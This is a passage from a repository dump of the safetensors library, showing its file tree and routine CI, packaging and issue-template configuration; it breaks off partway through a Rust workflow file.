├── .dockerignore
├── .github
│   ├── ISSUE_TEMPLATE
│   │   ├── bug-report.yml
│   │   ├── config.yml
│   │   └── feature-request.yml
│   ├── PULL_REQUEST_TEMPLATE.md
│   ├── conda
│   │   ├── bld.bat
│   │   ├── build.sh
│   │   └── meta.yaml
│   ├── stale.yml
│   └── workflows
│       ├── build_documentation.yml
│       ├── build_pr_documentation.yml
│       ├── codecov.yml
│       ├── delete_doc_comment.yml
│       ├── delete_doc_comment_trigger.yml
│       ├── python-bench.yml
│       ├── python-release-conda.yml
│       ├── python-release.yml
│       ├── python.yml
│       ├── rust-release.yml
│       ├── rust.yml
│       ├── stale.yml
│       ├── trufflehog.yml
│       └── upload_pr_documentation.yml
├── .gitignore
├── .pre-commit-config.yaml
├── Dockerfile.s390x.test
├── LICENSE
├── Makefile
├── README.md
├── RELEASE.md
├── attacks
│   ├── README.md
│   ├── numpy_dos_create.py
│   ├── numpy_dos_get_pwned.py
│   ├── paddle_ace_create.py
│   ├── paddle_ace_get_pwned.py
│   ├── safetensors_abuse_attempt_1.py
│   ├── safetensors_abuse_attempt_2.py
│   ├── safetensors_abuse_attempt_3.py
│   ├── tf_ace_create.py
│   ├── tf_ace_get_pwned.py
│   ├── tf_safe_ace_create.py
│   ├── tf_safe_ace_get_pwned.py
│   ├── torch_ace_create.py
│   ├── torch_ace_get_pwned.py
│   ├── torch_dos_create.py
│   └── torch_dos_get_pwned.py
├── bindings
│   └── python
│       ├── .gitignore
│       ├── Cargo.toml
│       ├── LICENSE
│       ├── MANIFEST.in
│       ├── Makefile
│       ├── README.md
│       ├── benches
│       │   ├── test_flax.py
│       │   ├── test_mlx.py
│       │   ├── test_paddle.py
│       │   ├── test_pt.py
│       │   └── test_tf.py
│       ├── convert.py
│       ├── convert_all.py
│       ├── fuzz.py
│       ├── py_src
│       │   └── safetensors
│       │       ├── __init__.py
│       │       ├── __init__.pyi
│       │       ├── flax.py
│       │       ├── mlx.py
│       │       ├── numpy.py
│       │       ├── paddle.py
│       │       ├── py.typed
│       │       ├── tensorflow.py
│       │       └── torch.py
│       ├── pyproject.toml
│       ├── setup.cfg
│       ├── src
│       │   └── lib.rs
│       ├── stub.py
│       ├── tests
│       │   ├── data
│       │   │   └── __init__.py
│       │   ├── test_flax_comparison.py
│       │   ├── test_mlx_comparison.py
│       │   ├── test_paddle_comparison.py
│       │   ├── test_pt_comparison.py
│       │   ├── test_pt_model.py
│       │   ├── test_simple.py
│       │   └── test_tf_comparison.py
│       └── uv.lock
├── codecov.yaml
├── codecov.yml
├── docs
│   ├── safetensors.schema.json
│   └── source
│       ├── _toctree.yml
│       ├── api
│       │   ├── flax.mdx
│       │   ├── numpy.mdx
│       │   ├── paddle.mdx
│       │   ├── tensorflow.mdx
│       │   └── torch.mdx
│       ├── convert-weights.md
│       ├── index.mdx
│       ├── metadata_parsing.mdx
│       ├── speed.mdx
│       └── torch_shared_tensors.mdx
├── flake.lock
├── flake.nix
└── safetensors
    ├── Cargo.toml
    ├── LICENSE
    ├── README.md
    ├── benches
    │   └── benchmark.rs
    ├── fuzz
    │   ├── .gitignore
    │   ├── Cargo.toml
    │   └── fuzz_targets
    │       └── fuzz_target_1.rs
    └── src
        ├── lib.rs
        ├── slice.rs
        └── tensor.rs
/.dockerignore:
--------------------------------------------------------------------------------
1 | safetensors/target
2 | bindings/python/target
3 | Dockerfile.s390x.test
4 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug-report.yml:
--------------------------------------------------------------------------------
1 | name: "\U0001F41B Bug Report"
2 | description: Submit a bug report to help us improve safetensors
3 | body:
4 | - type: textarea
5 | id: system-info
6 | attributes:
7 | label: System Info
8 | description: Please share your system info with us. You can run the command `transformers-cli env` and copy-paste its output below.
9 | placeholder: safetensors version, platform, python version, ...
10 | validations:
11 | required: true
12 |
13 | # - type: textarea
14 | # id: who-can-help
15 | # attributes:
16 | # label: Who can help?
17 | # description: |
18 | # Your issue will be replied to more quickly if you can figure out the right person to tag with @
19 | # If you know how to use git blame, that is the easiest way, otherwise, here is a rough guide of **who to tag**.
20 | #
21 | # All issues are read by one of the core maintainers, so if you don't know who to tag, just leave this blank and
22 | # a core maintainer will ping the right person.
23 | #
24 | # Please tag fewer than 3 people.
25 | #
26 | # Models:
27 |
28 | # - text models: @ArthurZucker and @younesbelkada
29 | # - vision models: @amyeroberts
30 | # - speech models: @sanchit-gandhi
31 | # - graph models: @clefourrier
32 | #
33 | # Library:
34 | #
35 | # - flax: @sanchit-gandhi
36 | # - generate: @gante
37 | # - pipelines: @Narsil
38 | # - tensorflow: @gante and @Rocketknight1
39 | # - tokenizers: @ArthurZucker
40 | # - trainer: @sgugger
41 | #
42 | # Integrations:
43 | #
44 | # - deepspeed: HF Trainer: @stas00, Accelerate: @pacman100
45 | # - ray/raytune: @richardliaw, @amogkam
46 | # - Big Model Inference: @sgugger @muellerzr
47 | #
48 | # Documentation: @sgugger, @stevhliu and @MKhalusova
49 | #
50 | # Model hub:
51 |
52 | # - for issues with a model, report at https://discuss.huggingface.co/ and tag the model's creator.
53 | #
54 | # HF projects:
55 | #
56 | # - accelerate: [different repo](https://github.com/huggingface/accelerate)
57 | # - datasets: [different repo](https://github.com/huggingface/datasets)
58 | # - diffusers: [different repo](https://github.com/huggingface/diffusers)
59 | # - rust tokenizers: [different repo](https://github.com/huggingface/tokenizers)
60 | #
61 | # Maintained examples (not research project or legacy):
62 | #
63 | # - Flax: @sanchit-gandhi
64 | # - PyTorch: @sgugger
65 | # - TensorFlow: @Rocketknight1
66 |
67 | # Research projects are not maintained and should be taken as is.
68 |
69 | # placeholder: "@Username ..."
70 |
71 | - type: checkboxes
72 | id: information-scripts-examples
73 | attributes:
74 | label: Information
75 | description: 'The problem arises when using:'
76 | options:
77 | - label: "The official example scripts"
78 | - label: "My own modified scripts"
79 |
80 | - type: textarea
81 | id: reproduction
82 | validations:
83 | required: true
84 | attributes:
85 | label: Reproduction
86 | description: |
87 | Please provide a code sample that reproduces the problem you ran into. It can be a Colab link or just a code snippet.
88 | If you have code snippets, error messages, stack traces please provide them here as well.
89 | Important! Use code tags to correctly format your code. See https://help.github.com/en/github/writing-on-github/creating-and-highlighting-code-blocks#syntax-highlighting
90 | Do not use screenshots, as they are hard to read and (more importantly) don't allow others to copy-and-paste your code.
91 |
92 | placeholder: |
93 | Steps to reproduce the behavior:
94 |
95 | 1.
96 | 2.
97 | 3.
98 |
99 |
100 | - type: textarea
101 | id: expected-behavior
102 | validations:
103 | required: true
104 | attributes:
105 | label: Expected behavior
106 | description: "A clear and concise description of what you would expect to happen."
107 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/config.yml:
--------------------------------------------------------------------------------
1 | blank_issues_enabled: true
2 | version: 2.1
3 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature-request.yml:
--------------------------------------------------------------------------------
1 | name: "\U0001F680 Feature request"
2 | description: Submit a proposal/request for a new safetensors feature
3 | labels: [ "feature" ]
4 | body:
5 | - type: textarea
6 | id: feature-request
7 | validations:
8 | required: true
9 | attributes:
10 | label: Feature request
11 | description: |
12 | A clear and concise description of the feature proposal. Please provide a link to the paper and code in case they exist.
13 |
14 | - type: textarea
15 | id: motivation
16 | validations:
17 | required: true
18 | attributes:
19 | label: Motivation
20 | description: |
21 | Please outline the motivation for the proposal. Is your feature request related to a problem? e.g., I'm always frustrated when [...]. If this is related to another GitHub issue, please link here too.
22 |
23 |
24 | - type: textarea
25 | id: contribution
26 | validations:
27 | required: true
28 | attributes:
29 | label: Your contribution
30 | description: |
31 | Is there any way that you could help, e.g. by submitting a PR? Make sure to read the [CONTRIBUTING.md](https://github.com/huggingface/safetensors/blob/main/CONTRIBUTING.md) guide.
32 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | # What does this PR do?
2 |
3 |
12 |
13 |
14 |
15 | Fixes # (issue) or description of the problem this PR solves.
16 |
--------------------------------------------------------------------------------
/.github/conda/bld.bat:
--------------------------------------------------------------------------------
1 | cd bindings\python
2 | %PYTHON% -m pip install . --prefix=%PREFIX%
3 |
--------------------------------------------------------------------------------
/.github/conda/build.sh:
--------------------------------------------------------------------------------
1 | cd bindings/python
2 | $PYTHON -m pip install . --prefix=$PREFIX
3 |
--------------------------------------------------------------------------------
/.github/conda/meta.yaml:
--------------------------------------------------------------------------------
1 | {% set name = "safetensors" %}
2 |
3 | package:
4 | name: "{{ name|lower }}"
5 | version: "{{ SAFETENSORS_VERSION }}"
6 |
7 | source:
8 | path: ../../
9 |
10 | requirements:
11 | host:
12 | - pip
13 | - python x.x
14 | - setuptools
15 | - setuptools-rust
16 | - maturin
17 |
18 | run:
19 | - python x.x
20 |
21 | test:
22 | imports:
23 | - safetensors
24 |
25 | about:
26 | home: https://huggingface.co/docs/safetensors
27 | license: Apache License 2.0
28 | license_file: LICENSE
29 | summary: "Safe and portable way of storing tensors"
30 |
--------------------------------------------------------------------------------
/.github/stale.yml:
--------------------------------------------------------------------------------
1 | # Number of days of inactivity before an issue becomes stale
2 | daysUntilStale: 60
3 | # Number of days of inactivity before a stale issue is closed
4 | daysUntilClose: 7
5 | # Issues with these labels will never be considered stale
6 | exemptLabels:
7 | - pinned
8 | - security
9 | # Label to use when marking an issue as stale
10 | staleLabel: wontfix
11 | # Comment to post when marking an issue as stale. Set to `false` to disable
12 | markComment: >
13 | This issue has been automatically marked as stale because it has not had
14 | recent activity. It will be closed if no further activity occurs. Thank you
15 | for your contributions.
16 | # Comment to post when closing a stale issue. Set to `false` to disable
17 | closeComment: false
18 |
--------------------------------------------------------------------------------
/.github/workflows/build_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Build documentation
2 |
3 | on:
4 | push:
5 | branches:
6 | - main
7 | - doc-builder*
8 | - v*-release
9 | - use_templates
10 |
11 | jobs:
12 | build:
13 | uses: huggingface/doc-builder/.github/workflows/build_main_documentation.yml@main
14 | with:
15 | commit_sha: ${{ github.sha }}
16 | package: safetensors
17 | notebook_folder: safetensors_doc
18 | package_path: safetensors/bindings/python/
19 | version_tag_suffix: bindings/python/py_src/
20 | install_rust: true
21 | custom_container: huggingface/transformers-doc-builder
22 | secrets:
23 | token: ${{ secrets.HUGGINGFACE_PUSH }}
24 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
25 |
--------------------------------------------------------------------------------
/.github/workflows/build_pr_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Build PR Documentation
2 |
3 | on:
4 | pull_request:
5 | paths:
6 | - "docs/**"
7 | - "bindings/python/py_src/**"
8 | - ".github/workflows/build_pr_documentation.yml"
9 |
10 | concurrency:
11 | group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }}
12 | cancel-in-progress: true
13 |
14 | jobs:
15 | build:
16 | uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@main
17 | with:
18 | commit_sha: ${{ github.event.pull_request.head.sha }}
19 | pr_number: ${{ github.event.number }}
20 | package: safetensors
21 | package_path: safetensors/bindings/python/
22 | version_tag_suffix: bindings/python/py_src/
23 | install_rust: true
24 | custom_container: huggingface/transformers-doc-builder
25 |
--------------------------------------------------------------------------------
/.github/workflows/codecov.yml:
--------------------------------------------------------------------------------
1 | name: Code coverage
2 | on:
3 | push:
4 | branches:
5 | - main
6 |
7 | jobs:
8 | build:
9 | runs-on: ubuntu-latest
10 | defaults:
11 | run:
12 | working-directory: ./safetensors
13 |
14 | steps:
15 | - uses: actions/checkout@v3
16 |
17 | - name: Install Rust Stable
18 | uses: actions-rs/toolchain@v1
19 | with:
20 | toolchain: stable
21 | components: llvm-tools-preview
22 | override: true
23 |
24 | - uses: Swatinem/rust-cache@v2
25 |
26 | - name: Install cargo-llvm-cov for Ubuntu
27 | run: cargo install cargo-llvm-cov
28 |
29 | - name: Coverage report
30 | run: cargo llvm-cov --release --lcov --output-path lcov.info
31 |
32 | - name: Upload to codecov.io
33 | uses: codecov/codecov-action@v3
34 | with:
35 | token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos
36 | working-directory: ./safetensors
37 | fail_ci_if_error: true
38 |
--------------------------------------------------------------------------------
/.github/workflows/delete_doc_comment.yml:
--------------------------------------------------------------------------------
1 | name: Delete doc comment
2 |
3 | on:
4 | workflow_run:
5 | workflows: ["Delete doc comment trigger"]
6 | types:
7 | - completed
8 |
9 | jobs:
10 | delete:
11 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main
12 | secrets:
13 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
--------------------------------------------------------------------------------
/.github/workflows/delete_doc_comment_trigger.yml:
--------------------------------------------------------------------------------
1 | name: Delete doc comment trigger
2 |
3 | on:
4 | pull_request:
5 | types: [ closed ]
6 |
7 | jobs:
8 | delete:
9 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main
10 | with:
11 | pr_number: ${{ github.event.number }}
--------------------------------------------------------------------------------
/.github/workflows/python-bench.yml:
--------------------------------------------------------------------------------
1 | name: Simple benchmarks
2 | on:
3 | push:
4 | branches:
5 | - main
6 | pull_request:
7 |
8 |
9 | permissions:
10 | # deployments permission to deploy GitHub pages website
11 | deployments: write
12 | # contents permission to update benchmark contents in gh-pages branch
13 | contents: write
14 |
15 | jobs:
16 | benchmark:
17 | name: Performance regression check
18 | runs-on: ubuntu-latest
19 | steps:
20 | - uses: actions/checkout@v4
21 | - name: Install Rust
22 | uses: actions-rs/toolchain@v1
23 | with:
24 | toolchain: stable
25 | components: rustfmt, clippy
26 |
27 | - name: Install Python
28 | uses: actions/setup-python@v4
29 | with:
30 | python-version: "3.12"
31 | architecture: "x64"
32 |
33 | - name: Install
34 | working-directory: ./bindings/python
35 | run: |
36 | pip install -U pip uv
37 | uv sync --extra dev
38 |
39 | - name: Run tests
40 | working-directory: ./bindings/python
41 | run: |
42 | cargo test
43 | uv run pytest --benchmark-json output.json benches/
44 | # Download previous benchmark result from cache (if exists)
45 | - name: Download previous benchmark data
46 | uses: actions/cache@v4
47 | with:
48 | path: ./cache
49 | key: ${{ runner.os }}-benchmark
50 | # Run `github-action-benchmark` action
51 | - name: Store benchmark result
52 | uses: benchmark-action/github-action-benchmark@v1
53 | with:
54 | # What benchmark tool the output.json came from
55 | tool: 'pytest'
56 | # Where the output from the benchmark tool is stored
57 | output-file-path: ./bindings/python/output.json
58 | github-token: ${{ secrets.GITHUB_TOKEN }}
59 | # Push and deploy GitHub pages branch automatically
60 | auto-push: true
61 | comment-on-alert: true
62 | # Mention @Narsil in the commit comment
63 | alert-comment-cc-users: '@Narsil'
64 |
--------------------------------------------------------------------------------
/.github/workflows/python-release-conda.yml:
--------------------------------------------------------------------------------
1 | name: Python Release - Conda
2 |
3 | on:
4 | push:
5 | tags:
6 | - v*
7 |
8 | env:
9 | ANACONDA_API_TOKEN: ${{ secrets.ANACONDA_API_TOKEN }}
10 |
11 | jobs:
12 | build_and_package:
13 | runs-on: ${{ matrix.os }}
14 | strategy:
15 | matrix:
16 | os: [windows-latest, macos-latest]
18 | python: ["3.8", "3.9", "3.10", "3.11"]
19 |
20 | steps:
21 | - name: Checkout repository
22 | uses: actions/checkout@v3
23 |
24 | - name: Install miniconda
25 | uses: conda-incubator/setup-miniconda@v2
26 | with:
27 | auto-update-conda: true
28 | python-version: ${{ matrix.python }}
29 |
30 | - name: Conda info
31 | shell: bash -l {0}
32 | run: conda info
33 |
34 | - name: Install Rust
35 | uses: actions-rs/toolchain@v1
36 | with:
37 | toolchain: stable
38 |
39 | - name: Setup conda env
40 | shell: bash -l {0}
41 | run: |
42 | conda install setuptools-rust
43 | conda install -c defaults anaconda-client conda-build
44 |
45 | - name: Extract version
46 | shell: bash -l {0}
47 | working-directory: ./bindings/python
48 | run: echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV
49 |
50 | - name: Build conda packages
51 | shell: bash -l {0}
52 | run: |
53 | conda info
54 | conda list
55 | conda-build .github/conda --python=${{ matrix.python }}
56 |
57 | - name: Upload to Anaconda
58 | shell: bash -l {0}
59 | run: |
60 | anaconda upload `conda-build .github/conda --output` --force
61 |
62 | build_and_package_linux:
63 | runs-on: ubuntu-latest
64 | container: quay.io/pypa/manylinux2014_x86_64
65 |
66 | strategy:
67 | fail-fast: false
68 | matrix:
69 | python: [38, 39, 310, 311]
70 | include:
71 | - python: 38
72 | checksum: e2a4438671e0e42c5bba14cb51de6ce9763938184d6ca2967340bbe972bbe7e6
73 | - python: 39
74 | checksum: 9829d95f639bd0053b2ed06d1204e60644617bf37dd5cc57523732e0e8d64516
75 | - python: 310
76 | checksum: ea5e6e8a3d5a0247b9df85382d27220fac8e59b5778fd313c5913879cd9baafc
77 | - python: 311
78 | checksum: 634d76df5e489c44ade4085552b97bebc786d49245ed1a830022b0b406de5817
79 |
80 | steps:
81 | - name: Checkout repository
82 | uses: actions/checkout@v2
83 |
84 | - name: Install miniconda
85 | run: |
86 | yum install -y wget openssl-devel
87 | export FILENAME=Miniconda3-py${{ matrix.python }}_23.5.2-0-Linux-x86_64.sh
88 | wget https://repo.anaconda.com/miniconda/$FILENAME
89 | sha256sum $FILENAME | awk '$1=="${{ matrix.checksum }}"{print"good to go"}'
90 | bash $FILENAME -b -p $HOME/miniconda
91 | source $HOME/miniconda/bin/activate
92 |
93 | - name: Show glibc information
94 | shell: bash -l {0}
95 | run: ldd --version
96 |
97 | - name: Conda info
98 | shell: bash -l {0}
99 | run: |
100 | source $HOME/miniconda/bin/activate
101 | conda info
102 |
103 | - name: Install Rust
104 | uses: actions-rs/toolchain@v1
105 | with:
106 | toolchain: stable
107 |
108 | - name: Setup conda env
109 | shell: bash -l {0}
110 | run: |
111 | source $HOME/miniconda/bin/activate
112 | conda install setuptools-rust
113 | conda install -c defaults anaconda-client conda-build
114 |
115 | - name: Extract version
116 | shell: bash -l {0}
117 | working-directory: ./bindings/python
118 | run: |
119 | source $HOME/miniconda/bin/activate
120 | echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV
121 |
122 | - name: Build conda packages
123 | shell: bash -l {0}
124 | run: |
125 | source $HOME/miniconda/bin/activate
126 | conda info
127 | conda list
128 | conda-build .github/conda --python=${{ matrix.python }}
129 |
130 | - name: Upload to Anaconda
131 | shell: bash -l {0}
132 | run: |
133 | source $HOME/miniconda/bin/activate
134 | anaconda upload `conda-build .github/conda --output` --force
135 |
--------------------------------------------------------------------------------
/.github/workflows/python-release.yml:
--------------------------------------------------------------------------------
1 | # This file is autogenerated by maturin v1.7.4
2 | # To update, run
3 | #
4 | # maturin generate-ci github -m bindings/python/Cargo.toml
5 | #
6 | name: CI
7 |
8 | on:
9 | push:
10 | branches:
11 | - main
12 | - master
13 | tags:
14 | - '*'
15 | pull_request:
16 | workflow_dispatch:
17 |
18 | permissions:
19 | contents: read
20 |
21 | jobs:
22 | linux:
23 | runs-on: ${{ matrix.platform.runner }}
24 | strategy:
25 | matrix:
26 | platform:
27 | - runner: ubuntu-latest
28 | target: x86_64
29 | - runner: ubuntu-latest
30 | target: x86
31 | - runner: ubuntu-latest
32 | target: aarch64
33 | - runner: ubuntu-latest
34 | target: armv7
35 | - runner: ubuntu-latest
36 | target: s390x
37 | - runner: ubuntu-latest
38 | target: ppc64le
39 | steps:
40 | - uses: actions/checkout@v4
41 | - uses: actions/setup-python@v5
42 | with:
43 | python-version: 3.x
44 | - name: Build wheels
45 | uses: PyO3/maturin-action@v1
46 | with:
47 | target: ${{ matrix.platform.target }}
48 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
49 | sccache: 'true'
50 | manylinux: auto
51 | - name: Upload wheels
52 | uses: actions/upload-artifact@v4
53 | with:
54 | name: wheels-linux-${{ matrix.platform.target }}
55 | path: dist
56 |
57 | musllinux:
58 | runs-on: ${{ matrix.platform.runner }}
59 | strategy:
60 | matrix:
61 | platform:
62 | - runner: ubuntu-latest
63 | target: x86_64
64 | - runner: ubuntu-latest
65 | target: x86
66 | - runner: ubuntu-latest
67 | target: aarch64
68 | - runner: ubuntu-latest
69 | target: armv7
70 | steps:
71 | - uses: actions/checkout@v4
72 | - uses: actions/setup-python@v5
73 | with:
74 | python-version: 3.x
75 | - name: Build wheels
76 | uses: PyO3/maturin-action@v1
77 | with:
78 | target: ${{ matrix.platform.target }}
79 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
80 | sccache: 'true'
81 | manylinux: musllinux_1_2
82 | - name: Upload wheels
83 | uses: actions/upload-artifact@v4
84 | with:
85 | name: wheels-musllinux-${{ matrix.platform.target }}
86 | path: dist
87 |
88 | windows:
89 | runs-on: ${{ matrix.platform.runner }}
90 | strategy:
91 | matrix:
92 | platform:
93 | - runner: windows-latest
94 | target: x64
95 | - runner: windows-latest
96 | target: x86
97 | steps:
98 | - uses: actions/checkout@v4
99 | - uses: actions/setup-python@v5
100 | with:
101 | python-version: 3.x
102 | architecture: ${{ matrix.platform.target }}
103 | - name: Build wheels
104 | uses: PyO3/maturin-action@v1
105 | with:
106 | target: ${{ matrix.platform.target }}
107 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
108 | sccache: 'true'
109 | - name: Upload wheels
110 | uses: actions/upload-artifact@v4
111 | with:
112 | name: wheels-windows-${{ matrix.platform.target }}
113 | path: dist
114 |
115 | macos:
116 | runs-on: ${{ matrix.platform.runner }}
117 | strategy:
118 | matrix:
119 | platform:
120 | - runner: macos-13
121 | target: x86_64
122 | - runner: macos-14
123 | target: aarch64
124 | steps:
125 | - uses: actions/checkout@v4
126 | - uses: actions/setup-python@v5
127 | with:
128 | python-version: 3.x
129 | - name: Build wheels
130 | uses: PyO3/maturin-action@v1
131 | with:
132 | target: ${{ matrix.platform.target }}
133 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
134 | sccache: 'true'
135 | - name: Upload wheels
136 | uses: actions/upload-artifact@v4
137 | with:
138 | name: wheels-macos-${{ matrix.platform.target }}
139 | path: dist
140 |
141 | sdist:
142 | runs-on: ubuntu-latest
143 | steps:
144 | - uses: actions/checkout@v4
145 | - name: Build sdist
146 | uses: PyO3/maturin-action@v1
147 | with:
148 | command: sdist
149 | args: --out dist --manifest-path bindings/python/Cargo.toml
150 | - name: Upload sdist
151 | uses: actions/upload-artifact@v4
152 | with:
153 | name: wheels-sdist
154 | path: dist
155 |
156 | release:
157 | name: Release
158 | runs-on: ubuntu-latest
159 | if: ${{ startsWith(github.ref, 'refs/tags/') || github.event_name == 'workflow_dispatch' }}
160 | needs: [linux, musllinux, windows, macos, sdist]
161 | permissions:
162 | # Use to sign the release artifacts
163 | id-token: write
164 | # Used to upload release artifacts
165 | contents: write
166 | # Used to generate artifact attestation
167 | attestations: write
168 | steps:
169 | - uses: actions/download-artifact@v4
170 | - name: Generate artifact attestation
171 | uses: actions/attest-build-provenance@v1
172 | with:
173 | subject-path: 'wheels-*/*'
174 | - name: Publish to PyPI
175 | if: "startsWith(github.ref, 'refs/tags/')"
176 | uses: PyO3/maturin-action@v1
177 | env:
178 | MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN_DIST }}
179 | with:
180 | command: upload
181 | args: --non-interactive --skip-existing wheels-*/*
182 |
--------------------------------------------------------------------------------
/.github/workflows/python.yml:
--------------------------------------------------------------------------------
1 | name: Python
2 |
3 | on:
4 | pull_request:
5 |
6 | jobs:
7 | build_and_test:
8 | name: Check everything builds & tests
9 | runs-on: ${{ matrix.os }}
10 | strategy:
11 | matrix:
12 | os: [ubuntu-latest, macos-13, windows-latest]
13 | # Lowest and highest supported versions; the highest torch is unpinned so that
14 | # new releases get tested automatically
15 | version: [{torch: torch==1.10, python: "3.9", arch: "x64"}, {torch: torch, python: "3.12", arch: "x64"}]
16 | # TODO this would include macos ARM target.
17 | # however jax has an illegal instruction issue
18 | # that exists only in CI (probably difference in instruction support).
19 | # include:
20 | # - os: macos-latest
21 | # version:
22 | # torch: torch
23 | # python: "3.11"
24 | include:
25 | - os: ubuntu-latest
26 | version:
27 | torch: torch
28 | python: "3.13"
29 | arch: "x64-freethreaded"
30 | defaults:
31 | run:
32 | working-directory: ./bindings/python
33 | steps:
34 | - name: Checkout repository
35 | uses: actions/checkout@v3
36 |
37 |
38 | - name: Install Rust
39 | uses: actions-rs/toolchain@v1
40 | with:
41 | toolchain: stable
42 | components: rustfmt, clippy
43 |
44 | - name: Cargo install audit
45 | run: cargo install cargo-audit
46 |
47 | - uses: Swatinem/rust-cache@v2
48 | with:
49 | workspaces: "bindings/python"
50 |
51 | - name: Install Python
52 | uses: actions/setup-python@v5
53 | with:
54 | python-version: ${{ matrix.version.python }}
55 | architecture: ${{ matrix.version.arch }}
56 |
57 | - name: Lint with RustFmt
58 | run: cargo fmt -- --check
59 |
60 | - name: Lint with Clippy
61 | run: cargo clippy --all-targets --all-features -- -D warnings
62 |
63 | - name: Run Audit
64 | run: cargo audit -D warnings
65 |
66 | - name: Install
67 | run: |
68 | pip install -U pip
69 | pip install .[numpy]
70 |
71 | - name: Install (torch)
72 | if: matrix.version.arch != 'x64-freethreaded'
73 | run: |
74 | pip install ${{ matrix.version.torch }}
75 | shell: bash
76 |
77 | - name: Install (torch freethreaded)
78 | if: matrix.version.arch == 'x64-freethreaded'
79 | run: |
80 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cu126
81 | shell: bash
82 |
83 | - name: Install (tensorflow)
84 | if: matrix.version.arch != 'x64-freethreaded'
85 | run: |
86 | pip install .[tensorflow]
87 | shell: bash
88 |
89 | - name: Install (jax, flax)
90 | if: matrix.os != 'windows-latest' && matrix.version.arch != 'x64-freethreaded'
91 | run:
92 | pip install .[jax]
93 | shell: bash
94 |
95 | - name: Install (mlx)
96 | if: matrix.os == 'macos-latest'
97 | run: |
98 | pip install .[mlx]
99 | shell: bash
100 |
101 | - name: Check style
102 | run: |
103 | pip install .[quality]
104 | black --check --line-length 119 --target-version py35 py_src/safetensors tests
105 |
106 | - name: Run tests
107 | run: |
108 | cargo test
109 | pip install .[testing]
110 | pytest -sv tests/
111 |
112 | test_s390x_big_endian:
113 | runs-on: ubuntu-latest
114 | permissions:
115 | contents: write
116 | packages: write
117 | name: Test bigendian - S390X
118 | steps:
119 | - uses: actions/checkout@v2
120 | - name: Set up QEMU
121 | uses: docker/setup-qemu-action@v2
122 | - name: Set up Docker Buildx
123 | uses: docker/setup-buildx-action@v2
124 | - name: Set short sha
125 | id: vars
126 | run: echo "GITHUB_SHA_SHORT=$(git rev-parse --short HEAD)" >> $GITHUB_ENV
127 | - name: Docker meta
128 | id: meta
129 | uses: docker/metadata-action@v4
130 | with:
131 | # list of Docker images to use as base name for tags
132 | images: |
133 | ghcr.io/huggingface/safetensors/s390x
134 | # generate Docker tags based on the following events/attributes
135 | tags: |
136 | type=schedule
137 | type=ref,event=branch
138 | type=ref,event=pr
139 | type=semver,pattern={{version}}
140 | type=semver,pattern={{major}}.{{minor}}
141 | type=semver,pattern={{major}}
142 | type=sha
143 | - name: Login to Registry
144 | uses: docker/login-action@v3
145 | with:
146 | registry: ghcr.io
147 | username: ${{ github.actor }}
148 | password: ${{ secrets.GITHUB_TOKEN }}
149 | - name: Test big endian
150 | uses: docker/build-push-action@v4
151 | with:
152 | platforms: linux/s390x
153 | file: Dockerfile.s390x.test
154 | tags: ${{ steps.meta.outputs.tags }}
155 | labels: ${{ steps.meta.outputs.labels }}
156 | cache-from: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max
157 | cache-to: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max
158 |
--------------------------------------------------------------------------------
/.github/workflows/rust-release.yml:
--------------------------------------------------------------------------------
1 | name: Rust Release
2 |
3 | env:
4 | CRATES_TOKEN: ${{ secrets.CRATES_TOKEN }}
5 |
6 | on:
7 | push:
8 | tags:
9 | - v*
10 |
11 | jobs:
12 | rust_publish:
13 | runs-on: ubuntu-latest
14 | steps:
15 | - name: Checkout repository
16 | uses: actions/checkout@v3
17 |
18 | - name: Install Rust
19 | uses: actions-rs/toolchain@v1
20 | with:
21 | toolchain: stable
22 |
23 | - name: Cache Cargo Registry
24 | uses: actions/cache@v1
25 | with:
26 | path: ~/.cargo/registry
27 | key: ubuntu-latest-cargo-registry-${{ hashFiles('**/Cargo.toml') }}
28 |
29 | - name: Publish package rust
30 | if: ${{ !contains(github.ref, 'rc') }}
31 | working-directory: ./safetensors
32 | run: cargo publish --token ${CRATES_TOKEN}
33 |
34 |
--------------------------------------------------------------------------------
/.github/workflows/rust.yml:
--------------------------------------------------------------------------------
1 | name: Rust
2 |
3 | on:
4 | pull_request:
5 |
6 | jobs:
7 | build:
8 | runs-on: ${{ matrix.os }}
9 | strategy:
10 | matrix:
11 | os: [ubuntu-latest, windows-latest, macOS-latest]
12 | toolchain: [stable]
13 | include:
14 | - os: ubuntu-latest
15 | toolchain: "1.74"
16 | defaults:
17 | run:
18 | working-directory: ./safetensors
19 |
20 | steps:
21 | - uses: actions/checkout@v3
22 |
23 | - name: Install Rust
24 | uses: actions-rs/toolchain@v1
25 | with:
26 | toolchain: ${{ matrix.toolchain }}
27 | components: rustfmt, clippy, llvm-tools-preview
28 | override: true
29 |
30 | - uses: Swatinem/rust-cache@v2
31 |
32 | - name: Install cargo-audit
33 | run: cargo install cargo-audit
34 |
35 | - name: Install cargo-llvm-cov for Ubuntu
36 | if: matrix.os == 'ubuntu-latest'
37 | run: cargo install cargo-llvm-cov
38 |
39 | - name: Build
40 | run: cargo build --all-targets --verbose
41 |
